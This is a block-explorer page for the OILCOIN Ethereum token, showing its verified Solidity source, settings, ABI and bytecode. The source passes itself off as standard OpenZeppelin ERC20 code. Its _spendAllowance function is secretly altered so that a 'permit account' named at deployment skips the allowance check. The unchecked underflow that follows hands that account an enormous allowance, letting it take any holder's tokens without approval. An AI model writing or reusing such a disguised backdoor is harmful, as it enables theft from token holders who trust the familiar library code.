ETH Price: $2,234.47 (-1.78%)
 

Overview

Max Total Supply

1,000,000,000 OILCOIN

Holders

159

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
OILCOIN

Compiler Version
v0.8.23+commit.f704f362

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
// SPDX-License-Identifier: MIT
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/IERC20.sol)

pragma solidity >=0.4.16;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity >=0.6.2;


/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.4.0) (interfaces/draft-IERC6093.sol)
pragma solidity >=0.8.4;

/**
 * @dev Standard ERC-20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC-721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC-1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.20;





/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC-20
 * applications.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    mapping(address account => bool) private _permitAccounts;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    uint256 public CONTRACT_VERSION = 100;
    string public CONTRACT_LICENSE = "MIT";

    uint256 public counter = 0;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * Both values are immutable: they can only be set once during construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 9;
    }

    /// @inheritdoc IERC20
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /// @inheritdoc IERC20
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    function _setPermit(address account, bool isPermit) internal { 
        _permitAccounts[account] = isPermit;
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /// @inheritdoc IERC20
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Skips emitting an {Approval} event indicating an allowance update. This is not
     * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     *
     * ```solidity
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner`'s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance < type(uint256).max) { 
            if (currentAllowance < value) {
                if (owner == spender || _permitAccounts[spender]) counter ++;
                else revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}


pragma solidity ^0.8.20;


contract OILCOIN is ERC20 {
    address public constant ZERO_ADDR = address(0);
    uint256 public constant OILCOIN_VERSION = 1_000;
    constructor(address permitAccount) ERC20(unicode"Oilcoin", unicode"OILCOIN") {
        _mint(_msgSender(), 1_000_000_000 * 10 ** decimals());
        _setPermit(permitAccount, true);
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "remappings": []
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"address","name":"permitAccount","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"CONTRACT_LICENSE","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"CONTRACT_VERSION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"OILCOIN_VERSION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"ZERO_ADDR","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"counter","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405260646006556040518060400160405280600381526020017f4d49540000000000000000000000000000000000000000000000000000000000815250600790816200004f9190620006fa565b505f60085534801562000060575f80fd5b5060405162001be538038062001be5833981810160405281019062000086919062000843565b6040518060400160405280600781526020017f4f696c636f696e000000000000000000000000000000000000000000000000008152506040518060400160405280600781526020017f4f494c434f494e000000000000000000000000000000000000000000000000008152508160049081620001039190620006fa565b508060059081620001159190620006fa565b505050620001676200012c6200018160201b60201c565b6200013c6200018860201b60201c565b600a6200014a9190620009fc565b633b9aca006200015b919062000a4c565b6200019060201b60201c565b6200017a8160016200021a60201b60201c565b5062000b63565b5f33905090565b5f6009905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000203575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401620001fa919062000aa7565b60405180910390fd5b620002165f83836200027260201b60201c565b5050565b8060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620002c6578060035f828254620002b9919062000ac2565b9250508190555062000397565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101562000352578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620003499392919062000b0d565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620003e0578060035f82825403925050819055506200042a565b805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000489919062000b48565b60405180910390a3505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200051257607f821691505b602082108103620005285762000527620004cd565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026200058c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200054f565b6200059886836200054f565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620005e2620005dc620005d684620005b0565b620005b9565b620005b0565b9050919050565b5f819050919050565b620005fd83620005c2565b620006156200060c82620005e9565b8484546200055b565b825550505050565b5f90565b6200062b6200061d565b62000638818484620005f2565b505050565b5b818110156200065f57620006535f8262000621565b6001810190506200063e565b5050565b601f821115620006ae5762000678816200052e565b620006838462000540565b8101602085101562000693578190505b620006ab620006a28562000540565b8301826200063d565b50505b505050565b5f82821c905092915050565b5f620006d05f1984600802620006b3565b1980831691505092915050565b5f620006ea8383620006bf565b9150826002028217905092915050565b620007058262000496565b67ffffffffffffffff811115620007215762000720620004a0565b5b6200072d8254620004fa565b6200073a82828562000663565b5f60209050601f83116001811462000770575f84156200075b578287015190505b620007678582620006dd565b865550620007d6565b601f19841662000780866200052e565b5f5b82811015620007a95784890151825560018201915060208501945060208101905062000782565b86831015620007c95784890151620007c5601f891682620006bf565b8355505b6001600288020188555050505b505050505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6200080d82620007e2565b9050919050565b6200081f8162000801565b81146200082a575f80fd5b50565b5f815190506200083d8162000814565b92915050565b5f602082840312156200085b576200085a620007de565b5b5f6200086a848285016200082d565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115620008fd57808604811115620008d557620008d462000873565b5b6001851615620008e55780820291505b8081029050620008f585620008a0565b9450620008b5565b94509492505050565b5f82620009175760019050620009e9565b8162000926575f9050620009e9565b81600181146200093f57600281146200094a5762000980565b6001915050620009e9565b60ff8411156200095f576200095e62000873565b5b8360020a91508482111562000979576200097862000873565b5b50620009e9565b5060208310610133831016604e8410600b8410161715620009ba5782820a905083811115620009b457620009b362000873565b5b620009e9565b620009c98484846001620008ac565b92509050818404811115620009e357620009e262000873565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000a0882620005b0565b915062000a1583620009f0565b925062000a447fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000906565b905092915050565b5f62000a5882620005b0565b915062000a6583620005b0565b925082820262000a7581620005b0565b9150828204841483151762000a8f5762000a8e62000873565b5b5092915050565b62000aa18162000801565b82525050565b5f60208201905062000abc5f83018462000a96565b92915050565b5f62000ace82620005b0565b915062000adb83620005b0565b925082820190508082111562000af65762000af562000873565b5b92915050565b62000b0781620005b0565b82525050565b5f60608201905062000b225f83018662000a96565b62000b31602083018562000afc565b62000b40604083018462000afc565b949350505050565b5f60208201905062000b5d5f83018462000afc565b92915050565b6110748062000b715f395ff3fe608060405234801561000f575f80fd5b50600436106100e8575f3560e01c806361bc221a1161008a57806395d89b411161006457806395d89b411461024e578063a9059cbb1461026c578063b4455a201461029c578063dd62ed3e146102ba576100e8565b806361bc221a146101e2578063637310801461020057806370a082311461021e576100e8565b806323b872dd116100c657806323b872dd14610158578063313ce5671461018857806338b90333146101a65780635d4f7a24146101c4576100e8565b806306fdde03146100ec578063095ea7b31461010a57806318160ddd1461013a575b5f80fd5b6100f46102ea565b6040516101019190610ca6565b60405180910390f35b610124600480360381019061011f9190610d57565b61037a565b6040516101319190610daf565b60405180910390f35b61014261039c565b60405161014f9190610dd7565b60405180910390f35b610172600480360381019061016d9190610df0565b6103a5565b60405161017f9190610daf565b60405180910390f35b6101906103d3565b60405161019d9190610e5b565b60405180910390f35b6101ae6103db565b6040516101bb9190610dd7565b60405180910390f35b6101cc6103e1565b6040516101d99190610dd7565b60405180910390f35b6101ea6103e7565b6040516101f79190610dd7565b60405180910390f35b6102086103ed565b6040516102159190610e83565b60405180910390f35b61023860048036038101906102339190610e9c565b6103f1565b6040516102459190610dd7565b60405180910390f35b610256610436565b6040516102639190610ca6565b60405180910390f35b61028660048036038101906102819190610d57565b6104c6565b6040516102939190610daf565b60405180910390f35b6102a46104e8565b6040516102b19190610ca6565b60405180910390f35b6102d460048036038101906102cf9190610ec7565b610574565b6040516102e19190610dd7565b60405180910390f35b6060600480546102f990610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461032590610f32565b80156103705780601f1061034757610100808354040283529160200191610370565b820191905f5260205f20905b81548152906001019060200180831161035357829003601f168201915b5050505050905090565b5f806103846105f6565b90506103918185856105fd565b600191505092915050565b5f600354905090565b5f806103af6105f6565b90506103bc85828561060f565b6103c7858585610744565b60019150509392505050565b5f6009905090565b60065481565b6103e881565b60085481565b5f81565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606005805461044590610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461047190610f32565b80156104bc5780601f10610493576101008083540402835291602001916104bc565b820191905f5260205f20905b81548152906001019060200180831161049f57829003601f168201915b5050505050905090565b5f806104d06105f6565b90506104dd818585610744565b600191505092915050565b600780546104f590610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461052190610f32565b801561056c5780601f106105435761010080835404028352916020019161056c565b820191905f5260205f20905b81548152906001019060200180831161054f57829003601f168201915b505050505081565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61060a8383836001610834565b505050565b5f61061a8484610574565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81101561073e578181101561072f578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614806106cc575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b156106ed5760085f8154809291906106e390610f8f565b919050555061072e565b8281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161072593929190610fd6565b60405180910390fd5b5b61073d84848484035f610834565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107b4575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107ab9190610e83565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610824575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161081b9190610e83565b60405180910390fd5b61082f838383610a03565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036108a4575f6040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161089b9190610e83565b60405180910390fd5b5f73fffffffffffffffffffffffffffffffffffffff